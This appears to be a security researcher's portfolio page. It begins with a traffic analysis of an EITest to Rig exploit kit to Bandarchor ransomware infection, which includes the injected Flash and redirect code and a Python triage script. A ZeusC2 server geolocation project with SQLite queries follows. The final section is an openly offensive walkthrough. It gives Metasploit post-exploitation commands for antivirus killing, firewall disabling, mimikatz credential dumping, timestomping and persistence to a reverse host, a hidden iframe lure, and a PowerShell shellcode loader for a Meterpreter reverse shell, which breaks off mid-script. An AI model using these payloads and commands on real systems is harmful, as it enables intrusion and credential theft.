EITest -> Rig Exploit Kit -> Bandarchor Ransomware Traffic Analysis

Source: malware-traffic-analysis.net

The infection chain is as follows:

  • www[.]tdca[.]ca – Compromised site
  • mapobifi[.]xyz – 85.93.0.110 port 80 – EITest gate
  • ew[.]203kcontractorsarkansas[.]com – 109.234.36.220 port 80 – Rig EK
  • 109.236.87.204 – GET /default.jpg – Post-infection traffic caused by the Bandarchor ransomware
  • 109.236.87.204 – POST /yyy/fers.php – Post-infection traffic caused by the Bandarchor ransomware

*Analyze the PCAP with the display filter "http.request".

Relevant Additional Analysis:

  1. GET / HTTP/1.1 request to 207.182.128.162 (length: 523 bytes)
  2. GET HTTP requests to 85.93.0.110 x2 (length: 414 & 426 bytes, respectively)
  3. GET HTTP requests to 109.234.36.220 x4 (length: 523, 748, 698, & 504 bytes)
  4. GET HTTP requests to 109.236.36.204 x3 (length: 207, 229, & 229 bytes)


  1. Following the TCP stream of the GET request to 207.182.128.162 (length: 523 bytes) reveals the injected Flash object: its "movie" value points to hxxp://mapobifi.xyz/qdxtqktb-3eif2rcdffpankm1of3cknbdm0ktfmppsn5peeocarbobmmdrmkmmpnet3inaa9rre2e2atatfibmcpfrile and "allowScriptAccess" is set to "always", embedded in the website hxxp://www.tdca[.]ca.

The full injected source code on the compromised website is as follows:

<param name="allowScriptAccess" value="always"/><param name="movie" value="hxxp://mapobifi[.]xyz/qdxtqktkb-3eif2rcdffpankm1of3cknbdm0ktfmppsn5peeocarbobmmdrmkmmpnet3inaa9rre2e2atatfibmcpfrile/"/>

  2. GET mapobifi[.]xyz/qdxtqktkb3eif2rcdffpankm1of3cknbdm0ktfmppsn5peeocarbobmmdrmkmmpnet3inaa9rre2e2atatfibmcpfrile retrieves the Shockwave Flash file, which begins with the compressed-SWF header "CWS" (referrer: hxxp://tdca.ca).

GET /qdxtqktkb-3eif2rcdffpankm1of3cknbdm0ktfmppsn5peeocarbobmmdrmkmmpnet3inaa9rre2e2atatfibmcpfrile/ HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: hxxp://www[.]tdca[.]ca/
x-flash-version: 19,0,0,185
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: mapobifi.xyz
Connection: Keep-Alive
 
HTTP/1.1 200 OK
Date: Fri, 26 Aug 2016 22:46:49 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 5508
Connection: close
Content-Type: application/x-shockwave-flash
 
 
GET /qdxtqktkb-3eif2rcdffpankm1of3cknbdm0ktfmppsn5peeocarbobmmdrmkmmpnet3inaa9rre2e2atatfibmcpfrile/xqt.gif HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: hxxp://www[.]tdca[.]ca/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: mapobifi.xyz
Connection: Keep-Alive
 
HTTP/1.1 200 OK
Date: Fri, 26 Aug 2016 22:46:50 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 821
Connection: close
Content-Type: text/html; charset=UTF-8
 
 
3. The returned page (821 bytes, text/html) uses JavaScript to redirect the user to 'hxxp://ew[.]203KCONTRACTORSARKANSAS[.]COM/?zniKfrGYKh_HA4o=l3SKfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZfHFONu3w_xyrQUeZ4jzkLR62ZYxOwVVVkWsw5Azf-ZBKqE'.
The full source code is as follows:

FkvuNhVRWkQvU gHotiiKKThQZIzrkE fTWAIIlM d hRBB

document.location.href = "hxxp://ew[.]203KCONTRACTORSARKANSAS[.]COM/?zniKfrGYKh_HA4o=l3SKfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZfHFONu3w_xyrQUeZ4jzkLR62ZYxOwVVVkWsw5Azf-ZBKqE";

geLpj gSiBzQqkfSZxSYdDAiUSDyI JwGPSXD xnJ

 
4. GET hxxp://ew[.]203kcontractorsarkansas[.]com/?zniKfrGYKh_HA4o=l3SKfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZfHFONu3w_xyrQU
5. Same request but to GET index[.]php?zniKfrGYKh_HA4o=l3SKfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZfHFONu3w_xyrQU

6. GET /default.jpg and POST /yyy/fers[.]php to 109.236.87.204 (Bandarchor post-infection traffic)

The full exchange is as follows:
GET /default[.]jpg HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: 109.236.87.204
Cache-Control: no-cache
 
HTTP/1.1 200 OK
Date: Sat, 27 Aug 2016 01:10:20 GMT
Server: Apache/2.4.10 (Debian)
Last-Modified: Thu, 19 May 2016 09:26:49 GMT
ETag: "7-5332e92dca840"
Accept-Ranges: bytes
Content-Length: 7
Content-Type: image/jpeg
 
default

POST /yyy/fers[.]php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: post_example
Host: 109.236.87.204
Content-Length: 1395
Cache-Control: no-cache
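The stages above can be matched mechanically. As an added example (not part of the original write-up), the script below parses followed TCP streams, constructed here from the headers quoted above with the defanged hxxp:// and [.] notation kept, and reports which stage of the EITest -> Rig EK -> Bandarchor chain each one matches; the stage names, the 100-character query threshold and the stand-in POST body are my assumptions.

```python
import re
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Constructed sample streams built from the headers quoted in the write-up
# (defanged hxxp:// and [.] kept). Bodies the excerpt does not show are stand-ins.
LONG_Q = ("zniKfrGYKh_HA4o=l3SKfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_"
          "OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZfHFONu3w_xyrQU")
SWF_PATH = ("/qdxtqktkb-3eif2rcdffpankm1of3cknbdm0ktfmppsn5peeocarbobmmdrmkmmpnet3inaa9rre2e2"
            "atatfibmcpfrile/")
SAMPLE_STREAMS = [
    # 1. The injected <param movie=...> makes the browser fetch a SWF from the EITest gate.
    f"GET {SWF_PATH} HTTP/1.1\r\nReferer: hxxp://www[.]tdca[.]ca/\r\nx-flash-version: 19,0,0,185\r\n"
    "Host: mapobifi.xyz\r\n\r\nHTTP/1.1 200 OK\r\nContent-Length: 5508\r\n"
    "Content-Type: application/x-shockwave-flash\r\n\r\n",
    # 2. The gate answers the follow-up request with HTML whose only job is a redirect.
    f"GET {SWF_PATH}xqt.gif HTTP/1.1\r\nReferer: hxxp://www[.]tdca[.]ca/\r\nHost: mapobifi.xyz\r\n\r\n"
    "HTTP/1.1 200 OK\r\nContent-Length: 821\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n"
    f'FkvuNhVRWkQvU gHotiiKKThQZIzrkE\r\ndocument.location.href = "hxxp://ew[.]203KCONTRACTORSARKANSAS[.]COM/?{LONG_Q}";\r\n',
    # 3. Rig EK landing page: a single long opaque query value sent to a third host.
    f"GET /?{LONG_Q} HTTP/1.1\r\nHost: ew.203kcontractorsarkansas.com\r\n\r\n"
    "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n",
    # 4/5. Bandarchor post-infection traffic: 7-byte 'default' reply, then a POST.
    "GET /default.jpg HTTP/1.1\r\nHost: 109.236.87.204\r\nCache-Control: no-cache\r\n\r\n"
    "HTTP/1.1 200 OK\r\nContent-Length: 7\r\nContent-Type: image/jpeg\r\n\r\ndefault",
    "POST /yyy/fers.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\n"
    "User-Agent: post_example\r\nHost: 109.236.87.204\r\nContent-Length: 1395\r\n\r\n"
    "CONSTRUCTED-STAND-IN-FOR-THE-1395-BYTE-BODY",
]

@dataclass
class Exchange:
    method: str
    path: str
    headers: dict
    req_body: str = ""
    status: str = ""
    resp_headers: dict = field(default_factory=dict)
    body: str = ""

def _parse_head(block):
    """Return (start line, lower-cased header dict) for one request or response head."""
    lines = block.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers

def parse_exchange(raw):
    """Split a followed TCP stream into request head, request body, response head and body."""
    parts = raw.split("\r\n\r\n")
    start, headers = _parse_head(parts[0])
    method, path = start.split(" ")[:2]
    ex = Exchange(method, path, headers)
    idx = 1
    if int(headers.get("content-length", 0)) > 0 and len(parts) > idx:
        ex.req_body = parts[idx]  # a POST body travels before the reply
        idx += 1
    if len(parts) > idx and parts[idx].startswith("HTTP/"):
        ex.status, ex.resp_headers = _parse_head(parts[idx])
        ex.body = parts[idx + 1] if len(parts) > idx + 1 else ""
    return ex

def _host_of(url):
    return (urlsplit(url.replace("[.]", ".")).hostname or "") if url else ""

def triage(ex):
    """Return [(stage, detail)] for every stage of the chain this exchange matches."""
    hits = []
    host = ex.headers.get("host", "")
    ref_host = _host_of(ex.headers.get("referer", ""))
    ctype = ex.resp_headers.get("content-type", "")
    # Stage 1: Flash adds x-flash-version; a SWF from a host other than the page's is the gate.
    if "x-flash-version" in ex.headers and "x-shockwave-flash" in ctype and host != ref_host:
        hits.append(("eitest_gate_swf", f"SWF from {host}, page on {ref_host}"))
    # Stage 2: HTML whose script assigns document.location.href to another host.
    m = re.search(r'document\.location\.href\s*=\s*["\']([^"\']+)', ex.body)
    if m and "text/html" in ctype:
        hits.append(("eitest_js_redirect", f"redirects to {_host_of(m.group(1))}"))
    # Stage 3: Rig EK landing page, one opaque query value of 100+ characters.
    query = urlsplit(ex.path).query
    if re.fullmatch(r"[\w-]+=[\w-]{100,}", query) and host and host != ref_host:
        hits.append(("rig_ek_landing", f"{len(query)}-char opaque query to {host}"))
    # Stage 4: Bandarchor check-in ('default' served as image/jpeg) and POST with a bare UA.
    if ex.method == "GET" and ex.path == "/default.jpg" and ex.body.strip() == "default":
        hits.append(("bandarchor_checkin", f"{host} answered 'default' as {ctype}"))
    if ex.method == "POST" and ex.headers.get("user-agent") == "post_example":
        hits.append(("bandarchor_post", f"POST {ex.path} to {host} with UA post_example"))
    return hits

def run_triage(streams=SAMPLE_STREAMS):
    """Parse every stream and return the matched stages in capture order."""
    return [hit for raw in streams for hit in triage(parse_exchange(raw))]
```

run_triage() returns one (stage, detail) pair per matched stream, in capture order; printing it gives a per-stream verdict for the whole chain.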

ZeusC2Tracker: Location Analyzer Using GeoCode API

Goal: Obtain the geographical location coordinates of current and historical Zeus servers and visualize them on a Google Map.

Data Source:
(1) zeustracker.abuse.ch
(2) cybercrime-tracker.net

Languages: Python, Regular Expressions, SQLite, JavaScript, HTML
APIs: Google Maps Geocoding API, IP-API JSON API, plotly

[Chart: Number of ZeusC2 by mdate] We see the largest number of ZeusC2 in the first quarter of 2015.


*Creates a SQL table with 2,690 Zeus Command-and-Control servers and visualizes the database via the Google Maps Geocoding API.
Method of Operation:
*Creates SQL database "ZeusC2Tracker.sqlite" with columns mdate, url, ip, rtype, rsource;
*Converts Zeus hostnames to cities using the ip-api.com JSON API;
*Obtains lat/long values using the GeoCode API, and stores the values in another SQL database "geodata.sqlite";
*Maps the data from "geodata.sqlite" to the JavaScript file "where.js";
*Creates viewable Google-mapped values in "where.html", which points to "where.js".

Usage:
(1) Run Zeusloader.py to create the monolithic "ZeusC2Tracker.sqlite" database with columns mdate, url, ip, rtype, rsource;
(2) Run ZeusHostConverter.py to convert hostnames to cities using the ip-api.com JSON API and write the data to a new "where.data" file;
(3) Run Geoload.py to parse "where.data", obtain lat/long values using the GeoCode API, and store the values in the SQL database "geodata.sqlite";
(4) Run Geodump.py to map the data from "geodata.sqlite" to a new JavaScript file "where.js"; and
(5) View the Google-mapped values in "where.html", which points to "where.js".

Example of SQL query: "SELECT * FROM ZeusC2Tracker;"

Here are some interesting findings based on this SQL ZeusC2Tracker database of 2,690 ZeusC2s:

(1) We have 90 .ru [Russian] domains associated with ZeusC2s.
(2) We have 6 domains that contain the string "bank" associated with ZeusC2s.
(3) We have 1,442 default Zeus installs associated with ZeusC2s. They are identified by the default control panel path "/cp.php?m=login".
(4) We have 16 TOR [onion] domains associated with ZeusC2s.
(5) We have 1,092 .com domains associated with ZeusC2s.
(6) We have 35 .ua [Ukrainian] domains associated with ZeusC2s.
(7) We have 5 .cc [Cocos (Keeling) Islands – often used by the carding community] domains associated with ZeusC2s.
(8) We have 28 .su [Soviet Union] domains associated with ZeusC2s.
(9) We have 2 .gov [1 Colombian, 1 Turkish] domains associated with ZeusC2s.

(10) The 3 most popular IPs, 199.192.231.250 [26 domains], 198.1.80.203 [21 domains] and 162.144.127.104 [16 domains], are associated with ZeusC2s.
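As an added example, not code from the ZeusC2Tracker project, the block below recreates the ZeusC2Tracker table in an in-memory SQLite database with a few constructed rows (placeholder hosts and IPs) and runs the kind of queries behind the method and findings above. It also handles two details the notebook output shows: a single-quoted alias in ORDER BY is a string constant and sorts nothing, and mdate arrives in both DD-MM-YYYY and YYYY-MM-DD layouts, which must be normalised before counting per quarter.

```python
import sqlite3
from collections import Counter
from datetime import datetime

SCHEMA = """CREATE TABLE ZeusC2Tracker (
    id INTEGER PRIMARY KEY, mdate TEXT, url TEXT, ip TEXT, rtype TEXT, rsource TEXT)"""

# Constructed rows in the shape of the two feeds; hosts and IPs are placeholders.
SAMPLE_ROWS = [
    ("14-01-2016", "example-a.com.br/bosco/cp.php?m=login", "198.51.100.7", "Zeus", "CyberCrimeTracker.net"),
    ("06-01-2016", "example-b.com/jj/cp.php?m=login", "198.51.100.5", "Zeus", "CyberCrimeTracker.net"),
    ("06-01-2016", "example-b.com/ff/cp.php?m=login", "198.51.100.5", "Zeus", "CyberCrimeTracker.net"),
    ("2015-02-10", "example-c.ru/panel/cp.php?m=login", "203.0.113.9", "Citadel", "ZeusTracker.ch"),
    ("2015-03-01", "bankexample.su", "203.0.113.9", "ZeuS", "ZeusTracker.ch"),
    ("2015-03-20", "abcdefghijklmnop.onion/~x/cp.php?m=login", "", "Zeus", "CyberCrimeTracker.net"),
    ("2013-07-25", "203.0.113.40", "203.0.113.40", "Ice IX", "ZeusTracker.ch"),
]

def load(rows=SAMPLE_ROWS):
    """Create the ZeusC2Tracker table in memory and insert the rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    conn.executemany(
        "INSERT INTO ZeusC2Tracker (mdate, url, ip, rtype, rsource) VALUES (?, ?, ?, ?, ?)", rows)
    return conn

def normalise_date(s):
    """Accept both layouts found in mdate (YYYY-MM-DD and DD-MM-YYYY); return ISO YYYY-MM-DD."""
    for fmt in ("%Y-%m-%d", "%d-%m-%Y"):
        try:
            return datetime.strptime(s, fmt).strftime("%Y-%m-%d")
        except ValueError:
            continue
    raise ValueError(f"unrecognised mdate: {s!r}")

def count_matching(conn, pattern):
    """Distinct URLs matching a LIKE pattern, e.g. '%cp.php?m=login%' for default panels."""
    # Alias unquoted on purpose: ORDER BY 'n' sorts by the constant string 'n', i.e. not at all.
    rows = conn.execute(
        "SELECT url, COUNT(*) AS n FROM ZeusC2Tracker WHERE url LIKE ? GROUP BY url ORDER BY n DESC",
        (pattern,)).fetchall()
    return len(rows)

def tld_counts(conn):
    """Records per top-level domain of the C2 host, bare IPs grouped as '(ip)'.
    LIKE '%.ru%' also matches hosts such as 'www.ruyacafe.net', so the last label is used."""
    counts = Counter()
    for (url,) in conn.execute("SELECT url FROM ZeusC2Tracker"):
        host = url.split("/")[0].split(":")[0]
        last = host.rsplit(".", 1)[-1]
        counts["(ip)" if last.isdigit() else last.lower()] += 1
    return counts

def shared_ips(conn):
    """IPs hosting more than one C2 record, most shared first; rows with no ip are skipped
    (in the real table they form one large empty-ip group that would otherwise top the list)."""
    return conn.execute(
        "SELECT ip, COUNT(*) AS n FROM ZeusC2Tracker WHERE ip <> '' "
        "GROUP BY ip HAVING COUNT(*) > 1 ORDER BY n DESC, ip").fetchall()

def per_quarter(conn):
    """Records per calendar quarter after normalising mdate, e.g. {'2015Q1': 3}."""
    counts = Counter()
    for (mdate,) in conn.execute("SELECT mdate FROM ZeusC2Tracker"):
        iso = normalise_date(mdate)
        quarter = (int(iso[5:7]) - 1) // 3 + 1
        counts[f"{iso[:4]}Q{quarter}"] += 1
    return dict(sorted(counts.items()))
```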

In [2]:
import sqlite3
import pandas as pd
import plotly.plotly as py # interactive graphing
from plotly.graph_objs import Bar, Scatter, Marker, Layout
In [3]:
conn = sqlite3.connect('ZeusC2Tracker.sqlite')
In [3]:
df = pd.read_sql_query('SELECT * FROM ZeusC2Tracker', conn)
In [12]:
print(df)
[2690 rows x 6 columns]
In [15]:
# Alias left unquoted: ORDER BY 'num_of_ZeusC2' in single quotes orders by a constant string, i.e. not at all.
df = pd.read_sql_query("SELECT mdate, COUNT(*) AS num_of_ZeusC2 FROM ZeusC2Tracker GROUP BY mdate ORDER BY num_of_ZeusC2", conn)
py.iplot([Bar(x=df.mdate, y=df.num_of_ZeusC2)], filename='Number of ZeusC2 by mdate')
In [20]:
df = pd.read_sql_query("SELECT url, COUNT(*) AS num_of_RuZeusC2 FROM ZeusC2Tracker WHERE url LIKE '%.ru%' GROUP BY url ORDER BY num_of_RuZeusC2", conn)
In [21]:
print(df)
[90 rows x 2 columns]
In [23]:
df = pd.read_sql_query("SELECT url, COUNT(*) AS num_of_Bank_ZeusC2 FROM ZeusC2Tracker WHERE url LIKE '%bank%' GROUP BY url ORDER BY num_of_Bank_ZeusC2", conn)
print(df)
                                                 url  num_of_Bank_ZeusC2
0 centraltransbankonlinetrans.org/panel2/cp.php?... 1
1 evobank.co 1
2 goalgetterssa.in/banks/cp.php?m=login 1
3 syndlcatebank.co.in/6/serverphp/cp.php?m=login 1
4 ua-banki.com/images/cp.php?m=login 1
5 www.cbankng.info/11/admin/1/metro11/admin/1/cp... 1
6 zxjfcvfvhqfqsrpz.onion/~mekzi/log-bank_com/2/c... 1
In [32]:
df = pd.read_sql_query("SELECT url, COUNT(*) AS num_of_default_ZeusC2 FROM ZeusC2Tracker WHERE url LIKE '%cp.php?m=login%' GROUP BY url ORDER BY num_of_default_ZeusC2", conn)
In [33]:
print(df)
[1442 rows x 2 columns]
In [34]:
df = pd.read_sql_query("SELECT url, COUNT(*) AS num_of_TOR_ZeusC2 FROM ZeusC2Tracker WHERE url LIKE '%onion%' GROUP BY url ORDER BY num_of_TOR_ZeusC2", conn)
print(df)
In [38]:
df = pd.read_sql_query("SELECT url, COUNT(*) AS num_of_COM_ZeusC2_domains FROM ZeusC2Tracker WHERE url LIKE '%.com%' GROUP BY url ORDER BY num_of_COM_ZeusC2_domains", conn)
print(df)
[1092 rows x 2 columns]
In [40]:
df = pd.read_sql_query("SELECT url, COUNT(*) AS num_of_Zeus_ZeusC2_domains FROM ZeusC2Tracker WHERE url LIKE '%zeus%' GROUP BY url ORDER BY num_of_Zeus_ZeusC2_domains", conn)
print(df)
In [41]:
df = pd.read_sql_query("SELECT url, COUNT(*) AS num_of_UAZeusC2 FROM ZeusC2Tracker WHERE url LIKE '%.ua%' GROUP BY url ORDER BY num_of_UAZeusC2", conn)
print(df)
In [42]:
df = pd.read_sql_query("SELECT url, COUNT(*) AS num_of_US_ZeusC2 FROM ZeusC2Tracker WHERE url LIKE '%.us%' GROUP BY url ORDER BY num_of_US_ZeusC2", conn)
print(df)
In [43]:
df = pd.read_sql_query("SELECT url, COUNT(*) AS num_of_CC_ZeusC2 FROM ZeusC2Tracker WHERE url LIKE '%.cc%' GROUP BY url ORDER BY num_of_CC_ZeusC2", conn)
print(df)
                                                 url  num_of_CC_ZeusC2
0 astairepartners.cu.cc/pelumi/server/cp.php?m=l... 1
1 g0dday.cc/cp.php?m=login 1
2 jerryguy.usa.cc/css/panel.php?letter=login 1
3 jpardon.usa.cc/xxc/admin.php?m=login 1
4 www.marshall.usa.cc/war/panel.php?m=login 1
5 www.wideawake.cc/zak/cp.php?letter=login 1
In [44]:
df = pd.read_sql_query("SELECT url, COUNT(*) AS num_of_SU_ZeusC2 FROM ZeusC2Tracker WHERE url LIKE '%.su%' GROUP BY url ORDER BY num_of_SU_ZeusC2", conn)
print(df)
In [45]:
df = pd.read_sql_query("SELECT url, COUNT(*) AS num_of_Gov_ZeusC2 FROM ZeusC2Tracker WHERE url LIKE '%.gov%' GROUP BY url ORDER BY num_of_Gov_ZeusC2", conn)
print(df)
                                                 url  num_of_Gov_ZeusC2
0 ayancikmuftulugu.gov.tr/admin/cp.php?m=login 1
1 teatromunicipal.gov.co/images/indexx.php?lette... 1
In [20]:
df = pd.read_sql_query("SELECT mdate, ip, url, COUNT (*) FROM ZeusC2Tracker GROUP by ip HAVING COUNT(*) > 1 ORDER by COUNT(*) DESC", conn)
print(df)
[291 rows x 4 columns]
In [18]:
df = pd.read_sql_query("SELECT mdate, ip, url, COUNT(*) AS num_of_SameIP_ZeusC2 FROM ZeusC2Tracker GROUP BY ip HAVING COUNT(*) > 1 ORDER BY num_of_SameIP_ZeusC2 DESC", conn)  # order by the alias itself, not a quoted string literal, so the bars are actually sorted
py.iplot([Bar(x=df.ip, y=df.num_of_SameIP_ZeusC2)], filename='Number of Same IP ZeusC2')
In [22]:
df = pd.read_sql_query("SELECT mdate, ip, url FROM ZeusC2Tracker WHERE ip LIKE '%199.192.231.250%'", conn)
print df
In [23]:
df = pd.read_sql_query("SELECT mdate, ip, url FROM ZeusC2Tracker WHERE ip LIKE '%198.1.80.203%'", conn)
print df

In [24]:
df = pd.read_sql_query("SELECT mdate, ip, url FROM ZeusC2Tracker WHERE ip LIKE '%162.144.127.104%'", conn)
print df
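A self-contained version of the pivot these notebook cells perform, added here as an example and not the notebook's own code: constructed (mdate, ip, url) rows in the tracker's shape, the GROUP BY/HAVING query with ORDER BY naming the alias directly, and a date normaliser because the tracker mixes dd-mm-yyyy and yyyy-mm-dd strings. Table and column names follow the page; every row value is made up.

```python
import re
import sqlite3

# Constructed rows in the same (mdate, ip, url) shape as the ZeusC2Tracker table;
# none of these addresses or paths come from the page.
ROWS = [
    ("06-07-2015", "198.0.2.10", "example-a.test/html/cp.php?m=login"),
    ("06-07-2015", "198.0.2.10", "example-b.test/panel/cp.php?m=login"),
    ("15-06-2015", "198.0.2.10", "example-c.test/kwete/cp.php?letter=login"),
    ("2015-01-03", "203.0.113.7", "example-d.test/server/cp.php?m=login"),
    ("22-12-2014", "203.0.113.7", "example-e.test/adminpanel/admin.php?m=login"),
    ("11-05-2014", "192.0.2.44", "example-f.test/cp.php?m=login"),
]

# Same pivot as the notebook; the alias is referenced as a bare identifier in ORDER BY.
PIVOT_SQL = """
SELECT ip, COUNT(*) AS num_of_SameIP_ZeusC2, COUNT(DISTINCT mdate) AS active_days
FROM ZeusC2Tracker
GROUP BY ip
HAVING COUNT(*) > 1
ORDER BY num_of_SameIP_ZeusC2 DESC, ip
"""

def normalize_date(s):
    """Rewrite dd-mm-yyyy as yyyy-mm-dd so string ordering equals chronological ordering."""
    m = re.fullmatch(r"(\d{2})-(\d{2})-(\d{4})", s)
    return "{}-{}-{}".format(m.group(3), m.group(2), m.group(1)) if m else s

def load_tracker(rows):
    """Build an in-memory tracker table with normalised dates."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ZeusC2Tracker (mdate TEXT, ip TEXT, url TEXT)")
    conn.executemany("INSERT INTO ZeusC2Tracker VALUES (?, ?, ?)",
                     [(normalize_date(d), ip, url) for d, ip, url in rows])
    return conn

def shared_ips(conn):
    """IPs hosting more than one panel, most reused first: (ip, panel_count, active_days)."""
    return [tuple(r) for r in conn.execute(PIVOT_SQL)]

def urls_for_ip(conn, ip):
    """Exact-match pivot on one IP (LIKE '%ip%' would also catch longer addresses sharing the prefix)."""
    q = "SELECT url FROM ZeusC2Tracker WHERE ip = ? ORDER BY mdate DESC, url"
    return [r[0] for r in conn.execute(q, (ip,))]

if __name__ == "__main__":
    c = load_tracker(ROWS)
    for ip, n, days in shared_ips(c):
        print(ip, n, days, urls_for_ip(c, ip))
```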

HTA Loader with Powershell Invocation -> System Compromise via CVE-2014-4113

Goal:

Simulate a sophisticated adversary: a compromised website serves a zip archive through a hidden iframe; the archive holds an .hta loader whose PowerShell invocation leads to a Meterpreter reverse TCP shell.

Steps: 

  • python unicorn.py windows/meterpreter/reverse_tcp hta (credits go to Dave Kennedy)
  • Serve the .hta loader as zipped “payment_invoice” with the encoded PowerShell at /var/www/html
Additional Metasploit Commands:
  • msfconsole -r unicorn.rb
  • meterpreter shell
  • getsid
  • getuid
  • migrate
  • getsystem
  • run killav
  • run checkvm
  • exploit Windows7 Service Pack 1 msp
  • use incognito
  • run countermeasure
  • run countermeasure –d –k
  • shell
    • netsh firewall set opmode disable //disable firewall
  • run vnc
  • load mimikatz
  • ls
  • upload /home/user/mimikatz.exe C:\\
  • timestomp mimikatz.exe -f "C:\\Windows\\System32\\cmd.exe"
  • shell
    • mimikatz.exe
    • privilege::debug
    • inject::process lsass.exe sekurlsa.dll
    • getLogonPasswords
    • sekurlsa::logonPasswords full
  • run persistence -A -L C:\\ -X -i 10 -p 443 -r 192.168.0.196
  • attrib +h c:\autoexec.bat //make it hidden
  • Priv Esc Exploit CVE-2014-4113 (ms14_058_track_popup_menu)

iframe Source code: 
 
<iframe id="frame" src="payment_invoice950123.zip" application="yes" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
 
Victim View
PowerShell Script:
 
$mcBY = '$kI9 = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $kI9 -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z = 0xda,0xc7,0xbe,0x87,0xd1,0x3a,0x4f,0xd9,0x74,0x24,0xf4,0x5f,0x33,0xc9,0xb1,0x47,0x31,0x77,0x18,0x83,0xc7,0x04,0x03,0x77,0x93,0x33,0xcf,0xb3,0x73,0x31,0x30,0x4c,0x83,0x56,0xb8,0xa9,0xb2,0x56,0xde,0xba,0xe4,0x66,0x94,0xef,0x08,0x0c,0xf8,0x1b,0x9b,0x60,0xd5,0x2c,0x2c,0xce,0x03,0x02,0xad,0x63,0x77,0x05,0x2d,0x7e,0xa4,0xe5,0x0c,0xb1,0xb9,0xe4,0x49,0xac,0x30,0xb4,0x02,0xba,0xe7,0x29,0x27,0xf6,0x3b,0xc1,0x7b,0x16,0x3c,0x36,0xcb,0x19,0x6d,0xe9,0x40,0x40,0xad,0x0b,0x85,0xf8,0xe4,0x13,0xca,0xc5,0xbf,0xa8,0x38,0xb1,0x41,0x79,0x71,0x3a,0xed,0x44,0xbe,0xc9,0xef,0x81,0x78,0x32,0x9a,0xfb,0x7b,0xcf,0x9d,0x3f,0x06,0x0b,0x2b,0xa4,0xa0,0xd8,0x8b,0x00,0x51,0x0c,0x4d,0xc2,0x5d,0xf9,0x19,0x8c,0x41,0xfc,0xce,0xa6,0x7d,0x75,0xf1,0x68,0xf4,0xcd,0xd6,0xac,0x5d,0x95,0x77,0xf4,0x3b,0x78,0x87,0xe6,0xe4,0x25,0x2d,0x6c,0x08,0x31,0x5c,0x2f,0x44,0xf6,0x6d,0xd0,0x94,0x90,0xe6,0xa3,0xa6,0x3f,0x5d,0x2c,0x8a,0xc8,0x7b,0xab,0xed,0xe2,0x3c,0x23,0x10,0x0d,0x3d,0x6d,0xd6,0x59,0x6d,0x05,0xff,0xe1,0xe6,0xd5,0x00,0x34,0x92,0xd0,0x96,0x77,0xcb,0xdb,0xa2,0x10,0x0e,0xdc,0x2b,0x5a,0x87,0x3a,0x7b,0xcc,0xc8,0x92,0x3b,0xbc,0xa8,0x42,0xd3,0xd6,0x26,0xbc,0xc3,0xd8,0xec,0xd5,0x69,0x37,0x59,0x8d,0x05,0xae,0xc0,0x45,0xb4,0x2f,0xdf,0x23,0xf6,0xa4,0xec,0xd4,0xb8,0x4c,0x98,0xc6,0x2c,0xbd,0xd7,0xb5,0xfa,0xc2,0xcd,0xd0,0x02,0x57,0xea,0x72,0x55,0xcf,0xf0,0xa3,0x91,0x50,0x0a,0x86,0xaa,0x59,0x9e,0x69,0xc4,0xa5,0x4e,0x6a,0x14,0xf0,0x04,0x6a,0x7c,0xa4,0x7c,0x39,0x99,0xab,0xa8,0x2d,0x32,0x3e,0x53,0x04,0xe7,0xe9,0x3b,0xaa,0xde,0xde,0xe3,0x55,0x35,0xdf,0xd8,0x83,0x73,0x95,0x30,0x10;$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$NNL=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($NNL.ToInt32()+$i), $z[$i], 